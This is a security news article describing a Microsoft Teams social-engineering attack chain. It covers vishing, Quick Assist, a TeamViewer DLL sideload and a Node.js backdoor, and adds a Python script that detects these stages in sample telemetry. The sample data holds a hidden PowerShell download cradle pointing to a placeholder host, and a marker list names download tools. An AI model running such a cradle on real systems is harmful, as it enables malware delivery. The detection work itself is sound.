Sophisticated Multi-Stage Attack Leveraging Microsoft Teams

A sophisticated multi-stage attack has emerged, where threat actors exploit Microsoft Teams to deliver malicious payloads, establishing persistence and remote access to corporate networks. This new attack vector takes advantage of Teams' perceived security as an internal business application, allowing attackers to bypass traditional email security controls.

Incident Documentation

Security firm Ontinue’s Cyber Defence Centre recently documented an incident in which attackers compromised systems using a combination of social engineering, vishing (voice phishing), and legitimate remote access tools.

Attack Methodology

The attack began with the threat actor sending a Microsoft Teams message to the target containing a malicious PowerShell command. Investigators noted, “The actor transmitted a PowerShell command directly via the Teams message and also utilized the QuickAssist remote tool to gain access to the target device remotely.” This initial access phase exploited users’ trust in team communications, particularly when the threat actor impersonated IT support personnel.

The observed PowerShell command executed from the target endpoint facilitated the download of first-stage malware. Upon execution, the attack leveraged DLL sideloading techniques with a legitimate signed TeamViewer.exe binary loading a malicious TV.dll module. This advanced technique helps bypass security controls as the initial executable appears legitimate and properly signed.

JavaScript Backdoor Establishes Command & Control

Analysis of the second-stage payload revealed a JavaScript-based backdoor executed via Node.js (renamed to hcmd.exe), which established a persistent connection to the attackers’ command-and-control infrastructure. The backdoor included socket capabilities for remote connections and command execution.

This attack pattern aligns with techniques attributed to threat actor Storm-1811, known for leveraging vishing, Quick Assist, and social engineering tactics. Microsoft has observed similar campaigns since mid-April 2024, in which attackers bombard victims with spam emails before calling while impersonating IT support staff. Security researchers at Trend Micro have also documented comparable attacks distributing DarkGate malware through Teams voice calls, where victims were instructed to download remote access applications like AnyDesk.

Detection and Mitigation

The attack chain utilizes several MITRE ATT&CK techniques, including:

  • T1105 – Ingress Tool Transfer
  • T1656 – Impersonation
  • T1219 – Remote Access Software
  • T1218 – Signed Binary Proxy Execution
  • T1197 – BITS Jobs
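To make the chain above concrete from the defender's side, here is an added example (not code from the article, Ontinue or Microsoft) of detection logic run over constructed Sysmon-style telemetry. It flags the four observable stages the report describes: a PowerShell download cradle (T1105, with BITS as the T1197 variant), a TeamViewer.exe process loading an unsigned or user-directory TV.dll (T1218 sideload), a renamed Node.js interpreter such as hcmd.exe whose OriginalFileName still says node.exe (T1036 Masquerading, a technique the article does not list), and a start of Quick Assist or AnyDesk where the organization has decided those are not required (T1219). Every path, user name, URL and the QuickAssist install directory in the sample records is invented; the field names follow Sysmon's schema.

```python
import json
import ntpath

# Constructed Sysmon-style telemetry, one JSON record per line
# (EventID 1 = process create, EventID 7 = image load). All paths,
# users and hosts are invented; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\explorer.exe", "ParentImage": "C:\\Windows\\System32\\userinit.exe", "CommandLine": "explorer.exe", "OriginalFileName": "EXPLORER.EXE"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -nop -w hidden -c \"Invoke-WebRequest -Uri http://stage.invalid/s1.zip -OutFile $env:TEMP\\s1.zip\"", "OriginalFileName": "PowerShell.EXE"}
{"EventID": 7, "Image": "C:\\Program Files\\TeamViewer\\TeamViewer.exe", "ImageLoaded": "C:\\Program Files\\TeamViewer\\TV.dll", "Signed": "true"}
{"EventID": 7, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\tv\\TeamViewer.exe", "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\tv\\TV.dll", "Signed": "false"}
{"EventID": 1, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\tv\\hcmd.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\tv\\TeamViewer.exe", "CommandLine": "hcmd.exe agent.js", "OriginalFileName": "node.exe"}
{"EventID": 1, "Image": "C:\\Placeholder\\QuickAssist\\QuickAssist.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "QuickAssist.exe", "OriginalFileName": "QuickAssist.exe"}
"""

# Substrings that indicate a PowerShell download cradle (T1105) or a BITS
# transfer (T1197). Matched case-insensitively against the command line.
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                    "start-bitstransfer", "bitsadmin")
# Directories where a signed TeamViewer install is expected to live.
TRUSTED_DIRS = ("c:\\program files", "c:\\program files (x86)", "c:\\windows")
# Remote access tools the article recommends blocking when not required.
REMOTE_TOOLS = {"quickassist.exe", "anydesk.exe"}


def parse_events(text):
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def _in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def detect(events):
    """Return one alert dict per suspicious event, in telemetry order."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid == 1:
            cmd = ev.get("CommandLine", "").lower()
            if _base(image) in {"powershell.exe", "pwsh.exe"} and any(m in cmd for m in DOWNLOAD_MARKERS):
                alerts.append({"rule": "powershell_download_cradle", "technique": "T1105/T1197", "image": image})
            # A binary whose embedded OriginalFileName is node.exe but whose
            # on-disk name differs (hcmd.exe in the report) is a renamed interpreter.
            if ev.get("OriginalFileName", "").lower() == "node.exe" and _base(image) != "node.exe":
                alerts.append({"rule": "renamed_node_interpreter", "technique": "T1036", "image": image})
            if _base(image) in REMOTE_TOOLS:
                alerts.append({"rule": "remote_access_tool_started", "technique": "T1219", "image": image})
        elif eid == 7:
            loaded = ev.get("ImageLoaded", "")
            # Legitimate TeamViewer.exe loading TV.dll is normal; an unsigned
            # TV.dll, or one outside a trusted install path, is the sideload.
            if _base(image) == "teamviewer.exe" and _base(loaded) == "tv.dll":
                if ev.get("Signed", "").lower() != "true" or not _in_trusted_dir(loaded):
                    alerts.append({"rule": "teamviewer_tv_dll_sideload", "technique": "T1218",
                                   "image": image, "loaded": loaded})
    return alerts


def run_detection(text=SAMPLE_EVENTS):
    return detect(parse_events(text))


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

Run against the constructed sample, the script raises four alerts (cradle, sideload, renamed node, Quick Assist start) and stays silent on the benign explorer.exe event and on a signed TV.dll loaded from Program Files. In a real pipeline the same rules would sit in the SIEM query language, with the trusted-directory list and the remote-tool set tuned to what the organization actually permits.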

Security experts recommend that organizations block or uninstall Quick Assist and similar remote monitoring tools if they are not required. Additionally, organizations should consider disabling external connections to their Teams environment to prevent such attacks. Microsoft has announced plans to implement alerts in Quick Assist to warn users of potential tech support scams.

As collaboration tools like Microsoft Teams become more prevalent, organizations must recognize the risks associated with these tools. Implementing robust security measures and providing user training are essential to maintaining a secure environment.


https://cybersecuritynews.com/hackers-leverage-microsoft-teams/
